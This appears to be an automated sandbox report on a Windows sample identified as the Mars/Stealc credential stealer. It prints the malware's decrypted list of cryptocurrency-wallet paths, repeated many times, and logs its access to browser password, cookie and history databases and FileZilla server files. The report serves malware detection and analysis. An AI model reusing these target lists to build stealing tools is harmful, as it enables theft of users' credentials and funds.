Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\jaxx\Local Storage\\file__0.localstorage
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000002.1754008719.000000000092E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1753586835.0000000000099000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Vk2yYa9dHl.exe PID: 7292, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Mars stealer
Source: Yara match File source: Vk2yYa9dHl.exe, type: SAMPLE
Source: Yara match File source: 0.2.Vk2yYa9dHl.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.Vk2yYa9dHl.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1753531870.0000000000051000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1633713421.0000000000051000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.1754008719.000000000092E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Vk2yYa9dHl.exe PID: 7292, type: MEMORYSTR
Source: Yara match File source: decrypted.binstr, type: MEMORYSTR
